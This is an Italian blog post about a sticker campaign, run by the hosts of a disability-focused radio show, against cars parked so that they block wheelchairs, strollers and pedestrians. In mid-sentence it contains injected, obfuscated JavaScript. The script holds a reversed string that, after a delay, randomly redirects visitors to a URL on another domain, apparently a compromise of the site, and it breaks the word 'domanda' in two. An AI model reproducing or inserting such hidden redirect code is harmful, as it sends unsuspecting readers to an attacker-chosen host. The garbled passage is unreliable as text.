Un adesivo contro l'inciviltà

image_pdfimage_print

E’ una serata come tante per noi che viviamo nei pressi dello stadio… una di quelle serate in cui si fa fatica a farsi largo tra le auto, parcheggiate ovunque e comunque: sui marciapiedi, sulle aiuole, sulle ciclabili, sugli spartitraffico… di punta, in  diagonale, per traverso… è esclusa solo la posizione verticale, ma probabilmente è una dimenticanza.

Se il parcheggio selvaggio – naturalmente impunito in nome della sacralità del pallone – dà fastidio a noi che possiamo camminare, figuriamoci quanto può esasperare chi si muove in carrozzina. E allora, che fare? Cercare sfogo alla propria rabbia muniti di un cacciavite? Forse è più costruttivo tentare la rieducazione degli automobilisti ignoranti con un eloquente adesivo che semplicemente dom (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}anda “…e io dove passo?”.

Si basa su questa idea la campagna di sensibilizzazione lanciata da Mauro Sbrillo e Claudio Coppini, conduttori per Radio Voce della Speranza della trasmissione “Handicappati in orbita”, in onda ogni primo martedì del mese alle 11 e dedicata al mondo della disabilità.

Ogni volta che si trova un’auto parcheggiata “a bischero”, in modo tale da impedire il passaggio di una sedia a rotelle (ma anche di un passeggino, di una bici, persino di una persona a piedi!) Mauro e Claudio ci invitano ad applicare l’apposito adesivo, “sul vetro e non sulla carrozzeria!”, precisano. Il veicolo così decorato può essere fotografato e postato sulla pagina Facebook.

Ma dove si prendono gli adesivi? Possono essere richiesti scrivendo all’indirizzo eiodovepasso@gmail.com

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *